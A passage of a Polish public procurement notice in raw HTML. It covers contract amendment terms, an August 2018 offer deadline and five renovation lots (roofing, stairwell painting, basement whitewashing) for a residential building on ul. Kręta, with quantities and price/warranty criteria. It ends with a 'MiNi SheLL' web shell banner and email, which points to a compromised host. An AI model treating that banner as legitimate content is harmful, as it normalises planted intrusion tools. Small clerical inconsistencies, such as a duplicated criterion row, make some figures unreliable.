<div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">a.	zmiana obowiązującej stawki VAT - w przypadku ustawowej zmiany podatku VAT wynagrodzenie brutto będzie ustalone w oparciu o nową stawkę VATb.	zmiany wynagrodzenia. W przypadku niewykonania przedmiotu zamówienia zgodnie z zobowiązaniem lub zmniejszenia zakresu robót przez Zamawiającego, wynagrodzenie Wykonawcy zostanie zmniejszone o wartość robót nie wykonanych (o wartość zmniejszonej ilości pieców akumulacyjnych), zgodnie z zasadami ustalonymi w §4 ust.4 umowy,c.	zmiany wynagrodzenia - W przypadku konieczności zwiększenia zakresu robót przez Zamawiającego, wynagrodzenie Wykonawcy zostanie powiększone o wartość robót wykonanych, ( o wartość zwiększonej ilości pieców akumulacyjnych), zgodnie z zasadami ustalonymi w § 4 ust. 4 umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-08-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Remont pokrycia dachowego segmenty F,G,H w budynku mieszkalnym przy ul. Kręta 109/111.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2.1.Usunięcie gontów papowych z mansard o pow. ok. 280 m2 2.2.Oczyszczenie z glonów i innych zanieczyszczeń istniejącego pokrycia z papy termozgrzewalnej o pow. ok. 155.46 m22.3.Wymiana narożnych słupków instalacji odgromowej na systemowe z uszczelką gumową (np. typu Farmer) 30 szt. wraz z dokładnym uszczelnieniem mocowań 2.4.Zaślepienie otworów w deskowaniu dachu po usuniętych słupkach instalacji odgromowej 30 miejsc2.5.Przybicie warstwy papy zgrzewalnej podkładowej na mansardach ok. 280 m2 2.6.Przybicie gontów papowych na mansardach (kolor i wzór uzgodnić z Zamawiającym) o pow. ok. 280 m22.7.Ułożenie warstwy papy termozgrzewalnej modyfikowanej na SBS wierzchniego krycia na dachu na pow. ok. 777.30 m22.8.Nowo klejoną warstwę papy termozgrzewalnej wywinąć na kominach do wysokości 0,5 m2.9.Umocowanie wywiniętej papy ponad istniejącą blacharkę (kominy) za pomocą paska blachy i uszczelnienie uszczelniaczem dekarskim ok. 55.20 mb 2.10.Wyklejenie papą termozgrzewalną obróbek blacharskich 14 daszków lukarn o pow. ok. 28,00 m22.11.Ułożenie warstwy wełny mineralnej gr 5 cm na stropie i wieńcach nad mieszkaniem nr 69 o pow. ok. 50 m2 2.12.Wymiana rur spustowych wraz z kolanami na 3 wiatrołapach fi 75, 9 mb.2.13.Demontaż starej i montaż nowej nakrywy wejścia dachowego wraz z obróbkami 1 szt.2.14.Obróbki blacharskie wiatrownic, ogniomurów, koszy paskami blachy powlekanej o szer. w rozwinięciu ponad 30 cm ok. 21 m22.15.Wymiana rynien fi 180 wraz z rynhakami 75 mb2.16.Wymiana rur spustowych fi 150, 20 mb. wraz z kolanami 6 szt.2.17.Wymiana czyszczaków na rurach spustowych szt. 2 2.18.Ustawienie i rozebranie rusztowań ok. 900,00 m22.19.Uporządkowanie terenu 2.20.Odtworzenie zieleni zniszczonej w trakcie prowadzenia robót 2.21. Wywiezienie i utylizacja materiałów pochodzących z rozbiórki<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45310000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Remont pokrycia dachowego segmenty A,B,C,D,E w budynku mieszkalnym przy ul. Kręta 109/111. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2a.1.Usunięcie gontów papowych z mansard o pow. ok. 773,99 m2 2a.2.Oczyszczenie z glonów i innych zanieczyszczeń istniejącego pokrycia z papy termozgrzewalnej o pow. ok. 279,58 m22a.3. .Wymiana narożnych słupków instalacji odgromowej na systemowe z uszczelką gumową (np. typu Farmer) 130 szt. wraz z dokładnym uszczelnieniem mocowań 2a.4.Zaślepienie otworów w deskowaniu dachu po usuniętych słupkach instalacji odgromowej 130 miejsc2a.5.Przybicie warstwy papy zgrzewalnej podkładowej na mansardach na pow. ok. 773,99 m2 2a.6.Przybicie gontów papowych na mansardach (kolor i wzór uzgodnić z Zamawiającym) na pow. ok. 773.30 m22a.7.Ułożenie warstwy papy termozgrzewalnej modyfikowanej na SBS wierzchniego krycia na dachu o pow. ok. 1397,90 m22a.8.Nowo klejoną warstwę papy termozgrzewalnej wywinąć na kominach do wysokości 0,5 m2a.9.Umocowanie wywiniętej papy ponad istniejącą blacharkę (kominy) za pomocą paska blachy i uszczelnienie uszczelniaczem dekarskim ok. 115.92 mb 2a.10.Wyklejenie papą termozgrzewalną obróbek blacharskich 14 daszków lukarn ok. 28,00 m2 2a.11.Wymiana rur spustowych wraz z kolanami na 7 wiatrołapach fi 75, 21 mb 2a.12.Demontaż starej i montaż nowej nakrywy wejścia dachowego wraz z obróbkami 1 szt2a.13.Obróbki blacharskie wiatrownic, ogniomurów, koszy paskami blachy powlekanej o szer. w rozwinięciu ponad 30 cm ok. 49 m22a.14.Wymiana rynien fi 180 wraz z rynhakami 100 mb2a.15.Wymiana rur spustowych fi 150, 50 mb wraz z kolanami 15 szt.2a.17.Montaż czyszczaków na rurach spustowych 5 szt.2a.18.Ustawienie i rozebranie rusztowań ok. 2 264.50 m22a.19.Uporządkowanie terenu 2a.20.Odtworzenie zieleni zniszczonej w trakcie prowadzenia robót2a.21.Wywiezienie i utylizacja odpadów <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45310000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-05-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Malowanie 2 klatek schodowych z wiatrołapami w segmencie E</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2b.22.Oczyszczenie i zmycie starego podłoża o pow. ok. 564,65 m22b.23.Zabezpieczenie podłóg i okien folią o pow. ok. 190.28 m22b.24.Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 320.61 m22b.25.Wymiana zagrzybionych płyt gipsowo-kartonowych o pow. 9,36 m22b.26.Wymiana zamokniętej wełny mineralnej gr 15 cm 9,36 m22b.27. Likwidacja zacieków o pow. ok. 10 m22b.28.Zagruntowanie ścian środkiem gruntującym o pow. 564,65 m22b.29.Malowanie ścian lamperii farbami zmywalnymi odpornymi na zabrudzenia i ścieranie (kolor uzgodnić z Zamawiającym) o pow. 244,04 m22b.30.Malowanie ścian i sufitów ponad lamperiami farbami emulsyjnymi o pow. 320,61 m22b.31.Malowanie podstopnic schodów, policzków z wywinięciem 10 cm od spodu biegu schodowego farbą do betonów o pow. 36,72 m22b.32.Malowanie stolarki drzwiowej, szafek instalacyjnych farbą ekologiczną o pow. 36 m22b.33.Malowanie grzejników stalowych o pow. 4,00 m22b.34.Malowanie rur o średnicy do 50 mm o dł. 36 mb2b.35.Malowanie balustrad farbą olejną o pow. 109,12 m22b.36.Wymiana uszczelnień pod parapetem okien klatek schodowych2b.37.Codzienne utrzymywanie w czystości schodów i pochwytów balustrad2b.38.Dokładne umycie klatek schodowych, okien i drzwi po zakończeniu robót remontowych 2b.39.Wywiezienie i utylizacja odpadówWiatrołapy (2 szt.)2b.40..Oczyszczenie i zmycie starego podłoża o pow. 47,32 m22b.41.Zabezpieczenie podłóg i drzwi folią o pow. 13,40 m22b.42.Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 27,30 m22b.43.Zagruntowanie ścian środkiem gruntującym o pow. 47,32 m22b.44.Wykonanie warstwy podkładowej pod tynk strukturalny o pow. 27,30 m2 2b.45.Nałożenie tynku strukturalnego (baranka) do wysokości lamperii o pow. 27,30m22b.46.Malowanie lamperii farbami zmywalnymi odpornymi na zabrudzenia o pow. 27,30 m22b.47.Malowanie skrzynek energetycznych o pow. 1,00 m2 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45310000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-05-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Malowanie 8 klatek schodowych z wiatrołapami w segmentach A,B,C,D,F,G,H.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2c.1. Oczyszczenie i zmycie starego podłoża o pow. ok. 2258,60 m22c.2. Zabezpieczenie podłóg i okien folią o pow. ok. 761,12 m22c.3. Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 1282,44 m22c.4. Wymiana zagrzybionych płyt gipsowo-kartonowych o pow. 9,36 m22c.5. Wymiana zamokniętej wełny mineralnej gr. 15 cm o pow. 9,36 m22c.6 .Zagruntowanie ścian środkiem gruntującym o pow. 2258,60 m2 2c.7.Malowanie ścian lamperii farbami zmywalnymi odpornymi na zabrudzenia i ścieranie (kolor uzgodnić z Zamawiającym)o pow. 976,16 m22c.8.Malowanie ścian i sufitów ponad lamperiami farbami emulsyjnymi o pow. 1282,44 m22c.9.Malowanie podstopnic schodów, policzków z wywinięciem 10 cm od spodu biegu schodowego farbą do betonów o pow. 146,88 m22c.10.Malowanie stolarki drzwiowej, szafek instalacyjnych farbą ekologiczną o pow. 144 m22c.11.Malowanie grzejników stalowych o pow. 16,00 m22c.12.Malowanie rur o średnicy do 50 mm o dł. 144 mb2c.13.Malowanie balustrad farbą olejną o pow. 436,48 m22c.14.Wymiana uszczelnień pod parapetami okien klatek schodowych2c.15.Codzienne utrzymywanie w czystości schodów i pochwytów balustrad2c.16.Umycie klatek schodowych, okien i drzwi po zakończeniu robót remontowych 2c.17.Wywiezienie i utylizacja odpadówWiatrołapy (8 szt.)4.38.Oczyszczenie i zmycie starego podłoża o pow. 189,18 m24.39.Zabezpieczenie podłóg i drzwi folią o pow. 52,56 m24.40.Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 109,20 m24.41.Zagruntowanie ścian środkiem gruntującym o pow. 189,18 m24.42.Wykonanie warstwy podkładowej pod tynk strukturalny o pow. 109,20 m2 4.43.Nałożenie tynku strukturalnego (baranka) do wysokości lamperii o pow. 109,20m24.44.Malowanie lamperii farbami zmywalnymi odpornymi na zabrudzenia o pow. 10,20 m24.45.Malowanie skrzynek energetycznych o pow. 4,00 m2 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45310000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-05-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Białkowanie pomieszczeń piwnicznych: komunikacji, pralni i suszarni.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2d.1.1. Zabezpieczenie podłóg i okien folią o pow. ok. 645,72 m22d.1.2. Zmycie ścian i sufitów o pow. ok. 1 663,21 m2 2d.1.3. Malowanie ścian i sufitów farbą do pom. piwnicznych ( odporną na wilgoć) o pow. ok. 1 663,21 m22d.1.4. Pomalowanie drzwi wewnętrznych w pomieszczeniach: komunikacji, pralni i suszarni ilość 22 szt. 2d.1.5. Umycie posadzek okien po robotach malarskich2d.1.6. Wywiezienie i utylizacja odpadów po robotach malarskich. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45310000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-05-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com